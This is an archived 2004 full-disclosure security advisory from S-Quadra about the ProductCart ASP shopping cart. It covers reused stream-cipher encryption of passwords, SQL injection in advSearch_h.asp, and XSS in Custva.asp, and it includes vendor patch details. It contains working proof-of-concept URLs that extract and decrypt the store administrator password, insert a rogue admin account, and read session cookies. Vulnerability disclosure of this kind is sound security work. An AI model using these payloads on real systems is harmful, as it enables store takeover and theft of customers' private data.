lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4035F834.8010904@s-quadra.com>
Date: Fri, 20 Feb 2004 15:06:12 +0300
From: Nick Gudov <cipher@...uadra.com>
To: full-disclosure <full-disclosure@...ts.netsys.com>,
   bugtraq <bugtraq@...urityfocus.com>
Subject: EarlyImpact ProductCart shopping cart software multiple security
 vulnerabilities


 We are republishing our advisory of 02/18/2004 with an apology to
EarlyImpact software developers for missing their FIX information in
our first publication. We would like to pay tribute EarlyImpact for
their swift reaction in problems resolving.

Below is the full version of the advisory of 02/18/2004:


    S-Quadra Advisory #2004-02-16
    
Topic: EarlyImpact ProductCart shopping cart software multiple security 
vulnerabilities
Severity: High
Vendor URL: http://www.earlyimpact.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040216.txt
Release date: 16 Feb 2004
    
 1. DESCRIPTION
    
 ProductCart is a shopping cart application for e-commerce enabled
sites. Its written on ASP, works on most Windows platforms and uses MS
Access or MS SQL Server as a backend. Please visit 
http://www.earlyimpact.com
for information about ProductCart shopping cart.
     
 2. DETAILS
     
 -- Vulnerability 1: Incorrect use of cryptography
     
 ProductCart software uses stream cipher algorithm (possibly RC4) to
encrypt various passwords before storing them in a database. A stream
cipher generates a keystream (a sequence of bits used as a key).
Encryption is accomplished by combining the keystream with the plaintext
with the bitwise XOR operation. The generation of the keystream is
independent of the plaintext and ciphertext. In ProductCart the single
cryptographic key used to encrypt all customers and store administrator
passwords so it's possible for an attacker to perform a choosen
plaintext attack and obtain first 100 bytes of keystream (maximum length
of customer password). Using this bytes an attacker can decrypt any
encrypted information from the database including store administrator
password.
      
 -- Vulnerability 2: SQL Injection vulnerability
      
 An SQL Injection vulnerability has been found in the 'advSearch_h.asp'
script.
   
 Inproper use of user supplied input filters allows an attacker to
modify SQL query and perform some kinds of SQL injection attacks.
     
 Successfull exploitation of this vulnerability could allow an attacker
to gain administrative access to ProductCart store and read any
information from store database (i.e. customers private data). Also an
attacker could execute arbitrary commands using xp_cmdshell function.
 
 -- Vulnerability 3: Cross Site Scripting vulnerability in 'Custva.asp'
     
 By injecting specially crafted javascript code in url and tricking a
user to visit it a remote attacker can steal user session id and gain
access to user's personal data.
      
 -- PoC code
      
 --Vulnerability 1 and 2:
      
 Platform: MS SQL Server as a backend

 ProductCart software incorrect uses cryptographic algorithms to protect
store administrator password. Combination of this error and SQL
injection vulnerability allow an attacker to gain administrative access
to store.
       
 Performing following scenarion an attaker can find the store
administrator username and password.
        
 Scenario:
        
1. An attacker register new customer in store. Let the value of field
'Postal Code' in the registration form will be equal to '987654' and an
attacker must select long password (it should be longer then the store
administrator password).
        
2. An attacker performs the following request
        
 http://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastName=(s--elect%20top%01%20adminpassword%20from%20admins),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33& 

        
3. An attacker goes to http://[target]/productcart/pc/Custmoda.asp
and reads his personal information. The value of the "FirstName" field
in this form will be store administrator login name. Store administrator
password is easy to find by this formula:
        
  adminpass = (Last Name) xor (Phone) xor (customer login password from 
scenario step 1)
         
 In the following scenario an attacker can add a new administrator to store
         
 Scenario:
         
1. An attacker register new customer in store. Let the value of 'First
Name' field in registration form will be equal to '1*2*3*4*5*6*7*8*9*10*',
the value of 'Last Name ' field will be equal to '34567', the value of
'Password' field will be equal to '111' and the value of 'Postal Code'
field will be equal to '987654'.
         
2. An attacker performs the following request:
         
 http://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33& 

         
         
3. An attacker logs into the store admin interface with username
'34567' and password '111'.
         
 -- Vulnerability 3:
         
 http://[target]/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><" 

         
 3. FIX INFORMATION
         
 S-Quadra alerted EarlyImpact development team to this issue on 29th 
January 2004.
 
 Early Impact official response:

  "Vulnerability 1 cannot be exploited since vulnerability 2 and 3 have 
been
addressed. Nevertheless, Early Impact is further investigating the issue 
and
will look at alternative uses of cryptography for future versions of 
ProductCart.
 
 Vulnerability 2 was addressed with the Security Patch released on 
01.30.2004,
which is available for download at no charge from
http://www.earlyimpact.com/productcart/support/ - This vulnerability 
does not
apply to ProductCart v2.53 and above. All users of ProductCart v2.52 and 
below
have been notified of this security issue and of the availability of the
corresponding Security Patch.
 
 Vulnerability 3 was addressed with the Security Patch released on 
01.30.2004,
which is available for download at no charge from
http://www.earlyimpact.com/productcart/support/ - This vulnerability 
does not
apply to ProductCart v2.53 and above. All users of ProductCart v2.52 and 
below
have been notified of this security issue and of the availability of the
corresponding Security Patch."
          
 4. CREDITS
          
 Nick Gudov <cipher@...uadra.com> is responsible for discovering this issue.
       
 5. ABOUT
       
 S-Quadra offers services in computer security, penetration testing and
network assesment, web application security, source code review and
third party product vulnerability assesment, forensic support and
reverse engineering.
         
    S-Quadra Advisory #2004-02-16

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ